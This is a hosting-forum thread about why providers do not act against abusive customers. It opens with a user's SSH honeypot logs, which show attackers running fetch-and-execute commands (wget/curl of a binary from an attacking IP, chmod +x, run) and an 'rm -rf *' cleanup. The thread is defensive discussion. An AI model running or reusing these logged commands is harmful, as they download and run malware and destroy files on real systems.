Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


Why don't providers act against abusers on their network?
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

Why don't providers act against abusers on their network?

bulbasaurbulbasaur Member
edited February 2021 in General

I've been a passive observer of /var/log/auth.log, but wondered what would happen if the attackers managed to get in. So, I wrote a small SSH honeypot that accepts any username and password, and within minutes I had IPs from DigitalOcean, OVH, BuyVM, and others trying to install malware:

{"ts": "2021-02-25 13:07:42 UTC", "ip": "161.35.212.151", "dport": 22, "username": "oracle", "password": "oracle", "allow": true}
{"ts": "2021-02-25 13:07:42 UTC", "ip": "161.35.212.151", "dport": 22, "username": "oracle", "exec_cmd": "lscpu ; wget redacted.com/redacted ; chmod +x * ; ./ninfo ; rm -rf *"}
{"ts": "2021-02-25 14:05:46 UTC", "ip": "154.223.166.124", "dport": 22, "username": "root", "password": "p@55word", "allow": true}
{"ts": "2021-02-25 14:05:47 UTC", "ip": "154.223.166.124", "dport": 22, "username": "root", "exec_cmd": "#!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget http://154.223.166.124/443\ncurl -O http://154.223.166.124/443\nchmod +x 443\n./443\n"}
{"ts": "2021-02-25 14:05:51 UTC", "ip": "154.223.166.124", "dport": 22, "username": "root", "exec_cmd": "ls -la /var/run/gcc.pid"}

My question is - why don't providers adopt such techniques to detect and boot abusers off their networks? The usual answer that I keep hearing is "how would they know"?

But, it seems all they need to do is run a honeypot of a similar kind on a few networks, and as soon as their IPs connect on their honeypots, they suspend the abuser (or at least, serve a notice on which they must reply in a day).

Thanked by 2AlwaysSkint Tsukihi
«1

Comments

  • What did you they say when you reported the intrusion to them?

  • DataIdeas-JoshDataIdeas-Josh Member, Patron Provider

    A lot of times it stays under the standard resource abuse limits so we don't get notifications. Also if nobody tells us about it then we don't know about it.
    Also you might want to check if the abuse is coming from TOR nodes as that can sometimes send out what you are seeing.
    ~Josh

    Thanked by 1jar
  • lentrolentro Member, Host Rep
    edited February 2021

    @DataIdeas-Josh said: A lot of times it stays under the standard resource abuse limits so we don't get notifications. Also if nobody tells us about it then we don't know about it.

    I think OP is asking why providers don't take proactive measures like setting up honeypots.

    Thanked by 1AlwaysSkint
  • jarjar Patron Provider, Top Host, Veteran
    edited February 2021

    Most often they do, the better questions are:

    1. Why don't they do what I want them to in the time frame that I want them to do it?
    2. Why don't they tell me in full detail what struggles they're having in keeping this particular abuse under control?
    3. What are the unique variables about this situation that form the greater context?

    And the short answer is that it's none of your business and sometimes the answers might violate their privacy policy and/or legal obligations. If you think they can't keep it under control and it bothers you, block their ranges.

    @stevewatson301 said: But, it seems all they need to do is run a honeypot of a similar kind on a few networks, and as soon as their IPs connect on their honeypots

    And are their customers demanding that, and leaving when they don't? Or do you expect them to run a charity for you, a third party that isn't paying them a dime or causing them to have any consequences?

    This is why blacklists exist, to try to crowdsource consequences for companies that might financially justify their spending to solve such things. If no one uses your blacklist to block the offending company's customers from reaching their own, then no one agrees that they deserve consequences. If no one agrees that they deserve consequences, you're probably overreacting.

    Thanked by 1mike1s
  • SGrafSGraf Member, Patron Provider

    @DataIdeas-Josh said:
    A lot of times it stays under the standard resource abuse limits so we don't get notifications. Also if nobody tells us about it then we don't know about it.
    Also you might want to check if the abuse is coming from TOR nodes as that can sometimes send out what you are seeing.
    ~Josh

    I'm +1 on this.

    If the automation doesn't catch it AND there are no external reports... then most providers will not even notice.

    That being said, I think that most providers you will find are fast when you actually file abuse reports.

    For your honeypot project: try parsing abuse addresses from sources such as whois or the ripe database,....

    As an example blocklist.de does it like this:

    ...We report.... in real time using Whois (abuse-mailbox, abuse@, security@, email, remarks), the Ripe-Abuse-Finder, and the contact-database from abusix.org so we may find the abuse-address assigned to the offending host. Our reports are based on X-Arf (Network Abuse Reporting 2.0), so the abuse-department of the provider for the attacking host may parse our reports automatically.

  • AlwaysSkintAlwaysSkint Member
    edited February 2021

    Short answer is that most providers don't give a fcuk. >:)
    (Slightly longer answer is that they expect the intended victims to protect themselves, whilst they harbour the criminal activity.)
    ((Obtuse answer is how many neighbours complain about the persistent barking from their 'friendly' neighbourhood dogs? If enough done it, would it stop? More appropriate for port scanning however.))

    Thanked by 1bulbasaur
  • randvegetarandvegeta Member, Host Rep

    @AlwaysSkint said:
    Short answer is that most providers don't give a fcuk. >:)
    (Slightly longer answer is that they expect the intended victims to protect themselves, whilst they harbour the criminal activity.)
    ((Obtuse answer is how many neighbours complain about the persistent barking from their 'friendly' neighbourhood dogs? If enough done it, would it stop? More appropriate for port scanning however.))

    It's not so much they (we) don't give a fcuk. It's more that we don't go looking for reasons to reduce our revenue stream.

    If it's reported in a clear and reasonable way, usually (at least for us) we take action.

    I do ignore a lot of 'abuse' reports. The ones that are extremely vague, unclear, inconclusive. Usually it's not a hacking related report. The most common reports we ignore are DMCA Take Down requests that DONT include our IP.

    They report a domain WITHOUT an IP and the domain resolves to some other IP, such as cloudflare. Yeah I'm not going to waste time following up with cloud flare. In any case, we block cloud flare emails.

    Generally speaking, if I get an abuse report that requires more than 5 mins to verify, it gets ignored. Especially when the request is coming from a commercial service who get's paid to make take down requests. Like WTF? Do your job and fill in the blanks for me, so I don't need to do your work for you! They get paid to make a case to make take down requests, so they should do the research and provide it in a clear format to the host and make it easy for the host to say "YES! THAT IS ABUSE" and shut it down. The 5 minute rule applies. Time is money and that's all the free time I'm willing to give.

    Thanked by 2jar feezioxiii
  • DataIdeas-JoshDataIdeas-Josh Member, Patron Provider

    @randvegeta said: The most common reports we ignore are DMCA Take Down requests that DONT include our IP.

    They report a domain WITHOUT an IP and the domain resolves to some other IP, such as cloudflare. Yeah I'm not going to waste time following up with cloud flare. In any case, we block cloud flare emails.

    Thisss here really gets on my nerves and then the complainer is consistently sending emails saying take it down but refuses to send PROOF that it's coming from our IPs.

  • randvegetarandvegeta Member, Host Rep

    @DataIdeas-Josh said:

    @randvegeta said: The most common reports we ignore are DMCA Take Down requests that DONT include our IP.

    They report a domain WITHOUT an IP and the domain resolves to some other IP, such as cloudflare. Yeah I'm not going to waste time following up with cloud flare. In any case, we block cloud flare emails.

    Thisss here really gets on my nerves and then the complainer is consistently sending emails saying take it down but refuses to send PROOF that it's coming from our IPs.

    Yes, if they keep sending bogus reports, their email gets blocked. This is actually why we blocked cloud flate.

    Cloud flare dont want to handle this shit manually so they simply automate their report forwarding. In one case in particular, we responded to cloud flare to inform them that the report was invalid and no actual abuse was taking place. They do not care. They simply keep forwarding. I asked how to get them to stop forwarding as there was NO ABUSE, to which they replied, we must remove the website being reported. Since it's ridiculous to remove a website that is violating no laws, we simply blocked cloud flare.

    Following up on abuse reports takes time. The onus should be on the reporter to provide as much information as possible. No info, no action. Simple

    Thanked by 1mike1s
  • @randvegeta said:

    @DataIdeas-Josh said:

    @randvegeta said: The most common reports we ignore are DMCA Take Down requests that DONT include our IP.

    They report a domain WITHOUT an IP and the domain resolves to some other IP, such as cloudflare. Yeah I'm not going to waste time following up with cloud flare. In any case, we block cloud flare emails.

    Thisss here really gets on my nerves and then the complainer is consistently sending emails saying take it down but refuses to send PROOF that it's coming from our IPs.

    Yes, if they keep sending bogus reports, their email gets blocked. This is actually why we blocked cloud flate.

    Cloud flare dont want to handle this shit manually so they simply automate their report forwarding. In one case in particular, we responded to cloud flare to inform them that the report was invalid and no actual abuse was taking place. They do not care. They simply keep forwarding. I asked how to get them to stop forwarding as there was NO ABUSE, to which they replied, we must remove the website being reported. Since it's ridiculous to remove a website that is violating no laws, we simply blocked cloud flare.

    Following up on abuse reports takes time. The onus should be on the reporter to provide as much information as possible. No info, no action. Simple

    THIS. I would say most providers will respond to a valid abuse report. Can't expect us to do anything if you're providing garbage data.

  • HostSlickHostSlick Member, Patron Provider
    edited February 2021

    Well. It happens

    Maybe there was no report yet .

    Once I had no abuse complaint when suddenly the authorities seized the customer dedicated server for such attacks. Ransomware attacks against other government in EU according to the documents

  • nice question. noted myself here for further study. thanks

  • I'm just going to leave this here. https://github.com/DigitalRuby/IPBan

    One of the better automatic abuse reporters.

    Thanked by 1AlwaysSkint
  • @jar said: And are their customers demanding that, and leaving when they don't? Or do you expect them to run a charity for you, a third party that isn't paying them a dime or causing them to have any consequences?

    Not sure what you're trying to get at:

    1. Is it also not in the interest of the provider in order to boot abusers off their network?

    2. I find it hard to believe that the provider will go bankrupt running 10 honeypots on a $3 VPS, for a monthly expense of $30. (The goal is not to catch all abusers, which you can't anyway if they're using it for targeted attacks.)

    Thanked by 1AlwaysSkint
  • DataIdeas-JoshDataIdeas-Josh Member, Patron Provider

    Automatic abuse reporters are annoying.

    Thanked by 1randvegeta
  • DataIdeas-JoshDataIdeas-Josh Member, Patron Provider

    @stevewatson301 said:

    @jar said: And are their customers demanding that, and leaving when they don't? Or do you expect them to run a charity for you, a third party that isn't paying them a dime or causing them to have any consequences?

    Not sure what you're trying to get at:

    1. Is it also not in the interest of the provider in order to boot abusers off their network?

    2. I find it hard to believe that the provider will go bankrupt running 10 honeypots on a $3 VPS, for a monthly expense of $30. (The goal is not to catch all abusers, which you can't anyway if they're using it for targeted attacks.)

    Any how much resources do you think the honeypots ACTUALLY take??? CPU/RAM/ etc.

  • @DataIdeas-Josh said: Any how much resources do you think the honeypots ACTUALLY take??? CPU/RAM/ etc.

    I don't "think", they actually run on 512 MB Lightsail instances and the examples that I showed in my original post are actually from one of those instances.

  • jarjar Patron Provider, Top Host, Veteran
    edited February 2021

    @stevewatson301 said:

    @jar said: And are their customers demanding that, and leaving when they don't? Or do you expect them to run a charity for you, a third party that isn't paying them a dime or causing them to have any consequences?

    Not sure what you're trying to get at:

    1. Is it also not in the interest of the provider in order to boot abusers off their network?

    2. I find it hard to believe that the provider will go bankrupt running 10 honeypots on a $3 VPS, for a monthly expense of $30. (The goal is not to catch all abusers, which you can't anyway if they're using it for targeted attacks.)

    Why should they? They don't exist to make you feel good. They're businesses. It's the job of you and their customers to make them care. If you can't and their customers won't, they have no incentive. Don't assume that your values are universally shared as priorities. They don't hire people to care about your concerns if you're not a customer.

    That's how we get back to blacklists: a commonly used method to generate incentive. If you can become the concern of their customers then you can influence their behavior. If you can't, then you will not have made a good enough case to be worthy of their investment into what you want.

    Most of the attacks come from poorly secured wordpress sites and the reality is that these people running them are a backbone of the industry. Scaling down a web host by tossing out these customers to make third parties feel good doesn't reduce abuse, it just makes one hosting provider smaller and the one that doesn't give a shit about your opinion larger.

    Honestly those people won't even believe that they're the problem. They'll blame their web host for their wordpress site getting hacked because "I didn't touch it and it was fine last week so must be your problem." They won't get better at hosting their websites and they won't spend a dime over $15 to deal with it, they'll keep moving until they find the provider that lets them be irresponsible. The customers don't care if their 6 year old wordpress site is brute forcing your server, doesn't bother them.

    That's the real truth of the internet. That's why they're not out there hiring teams of people waiting for you to tell them how many customers to get rid of every day. Trading their revenue for no long term net impact on the end result is of zero interest to them.

    If you can't tell I've been on every side of this issue at some point, so I feel pretty strongly that I understand the perspective of everyone involved. At HostGator I talked to the shitty wordpress customers who blamed me every day for their failure to update anything ever. At DigitalOcean I dealt with the most arrogant abuse reporters who thought I owed them action against my customers. At MXroute I deal with the inbound abuse from shitty hosts that ignore complaints. Everyone has an angle, but influence is easiest when you understand all of them.

    Thanked by 2bulbasaur DataWagon
  • bulbasaurbulbasaur Member
    edited February 2021

    @jar said: Scaling down a web host by tossing out these customers to make third parties feel good doesn't reduce abuse, it just makes one hosting provider smaller and the one that doesn't give a shit about your opinion larger.

    That's a valuable insight, I appreciate it :smile:

    So, it's just a case of "because no one else is doing it, customers would leave the host that enforces such terms", and maybe regulation in this respect is the only way forward.

    Thanked by 1jar
  • DataIdeas-JoshDataIdeas-Josh Member, Patron Provider

    Honestly just look at this website. There is hosting providers that pop up and die in the same year. The bigger hosts that are here deal with abuse accordingly when given proper proof of said abuse if from their services.
    That is a lot more than you can say with the big providers (AWS, Google, Azure, DO, Vultr, etc.)
    With stricter regulation will cause those Big providers to become even more bigger because they can get away with stuff the smaller hosts cannot.

    Thanked by 1jar
  • bulbasaurbulbasaur Member
    edited February 2021

    @DataIdeas-Josh said: With stricter regulation will cause those Big providers to become even more bigger because they can get away with stuff the smaller hosts cannot.

    That might be a uncharitable view, but regulations do increase costs for everyone which means startups or small businesses are disproportionately affected.

    Appreciate your and @jar's views -- it was a transformative experience to be exposed to the view of the business owner or the support rep who has to deal with the underlying problem, which they can't address directly because of societal and economic constraints.

    Thanked by 1jar
  • jsgjsg Member, Resident Benchmarker
    edited February 2021

    @stevewatson301

    Rule no. 1: There is no cushions and you are alone in the internet jungle.
    Rule no. 2: The states, police, etc. are not up to par nor do they really care.
    Rule no. 3: The true and only god of both companies and states is profit. You the customer and citizen are but an irritating necessity.
    Rule no. 4: Consumers don't really care, much less learn or act responsibly. They want to consume.

    (There are, of course sadly rare exceptions).

    Hence what is an abuser to you is a source of revenue for a provider. As long as a provider can reasonably say he didn't know, e.g. because certain (rather high) levels haven't been reached, he will not decide for your well-being but for his revenue. And there is neither clear and real determination and rules nor the capability to go against but a few high profile cases on the state's side. Hell, most states even can't protect their own infrastructure!

    The other big point is that most people not only aren't particularly smart and well educated but worse, they have a "someone will protect me" attitude, that someone typically being either the state, some (usually snake oil) product or service or some authority (e.g. "linux is secure", "those pros know what they are doing").

  • chihcherngchihcherng Veteran
    edited February 2021

    @stevewatson301 said:
    My question is - why don't providers adopt such techniques to detect and boot abusers off their networks? The usual answer that I keep hearing is "how would they know"?

    But, it seems all they need to do is run a honeypot of a similar kind on a few networks, and as soon as their IPs connect on their honeypots, they suspend the abuser (or at least, serve a notice on which they must reply in a day).

    The chance of abusers scanning their neighbors is very small. If providers do what you said, they will most likely log many IPs from others' networks, which they can't suspend.

    Providers do act when you report with proper information. I know that because sometimes they will relay the response of their customers to me. But some can't even get their abuse contact in WHOIS correct.

  • chihcherngchihcherng Veteran
    edited February 2021

    @DataIdeas-Josh said:
    Any how much resources do you think the honeypots ACTUALLY take??? CPU/RAM/ etc.

    The smallest VPS I use for detection has 128MB RAM. It monitors 10K TCP ports with HAProxy and detected malicious connection attempts from 12K+ IPs yesterday. Detection doesn't need much CPU power.

    The most important resource is an IPv4 address, without it your detection ability will be greatly limited.

  • @chihcherng said: The smallest VPS I use for detection has 128MB RAM. It monitors 10K TCP ports with HAProxy and detected malicious connection attempts from 12K+ IPs yesterday. Detection doesn't need much CPU power.

    Is your honeypot just a "dumb" receiver of TCP connections, or do they actually provide any interaction?

    Interaction gets you many more IPs than you would otherwise, because once a vulnerable host has been detected, you get the abusers contacting from many other IPs.

    1. If you have VPS for 3-5USD/month, you can't really have outstanding protection with packet filtering, IDS/IPS on HW level etc.
    2. For minimal security purposes, various software exists.. CSF, f2b and much more.

    With service providers like Microsoft/Google etc should simply block any traffic if you have constant connections with success? How provider can know if this usual custom services configured on the instance? Only if it's managed services and they get notifications of unusual activity, right? if that server is unmanaged, no abuses no cases from a client.. they should log into every instance to check everything? I doubt, only if this is a party of services. However, if this not reported at the very beginning you can easily claim they are playing with your personal data without any ask? For sure there will be a moment when a provider will start looking for such VPS:

    • abuse received;
    • constant load on a container/node or even shared account when this is noticeable because of massive degraded performance.

    No abuses or performance degradation - no problems at the end

  • chihcherngchihcherng Veteran
    edited February 2021

    @stevewatson301 said:
    Is your honeypot just a "dumb" receiver of TCP connections, or do they actually provide any interaction?

    Most of those malicious connections, I believe, come from compromised systems. I just want to make the victims aware of what happened to their computers. My HAProxy is indeed a "dumb" receiver of TCP connections, as I don't have the time and technique necessary to analyze hackers' attacking strategies, nor am I interested in that. HAProxy's log has given me enough information to report those incidents.

    Interaction gets you many more IPs than you would otherwise, because once a vulnerable host has been detected, you get the abusers contacting from many other IPs.

    I am not sure. Even it's true, what I lose due to no interaction, I can compensate by monitoring tens of thousands of TCP ports. In fact, if your honeypot is not "forking" in nature, I would suggest that you use HAProxy to proxy as many TCP ports as possible to your honeypot. You would find even more abusers this way.

  • DataWagonDataWagon Member, Patron Provider

    @stevewatson301 said:

    @jar said: And are their customers demanding that, and leaving when they don't? Or do you expect them to run a charity for you, a third party that isn't paying them a dime or causing them to have any consequences?

    Not sure what you're trying to get at:

    1. Is it also not in the interest of the provider in order to boot abusers off their network?

    2. I find it hard to believe that the provider will go bankrupt running 10 honeypots on a $3 VPS, for a monthly expense of $30. (The goal is not to catch all abusers, which you can't anyway if they're using it for targeted attacks.)

    It's not about the resources honeypots would utilize or how much it'd cost. Providers are trying to run a business. They have 1000 things to do that take priority over setting up honeypots to catch abusers on their network. What incentive do they have to spend time setting up, managing, and maintaining honeypots? Appeasing someone who isn't a customer and doesn't pay them a dime?

    Newsflash, the primary goal of any business is to make money. No provider in their right mind is going to dedicated manpower, resources, and money to intentionally downsize their customer base.

    Don't get me wrong, no one likes abuse on their network, not the provider, nor the victims. However, you can't expect providers with thousands of clients to dedicate resources to self police their network and seek out abusers. This is the whole reason why abuse desks exist.

  • bulbasaurbulbasaur Member
    edited February 2021

    @chihcherng said: I can compensate by monitoring tens of thousands of TCP ports.

    You don't need HAProxy for that, you can just use iptables DNAT rules to forward traffic from any TCP port to your honeypot and then use getsockopt(SO_ORIGINAL_DST) to get the original destination port.

    Thanked by 1chihcherng
  • Some providers can take your sister for spam abuse. @cociu does that. I was at risk one time!

Sign In or Register to comment.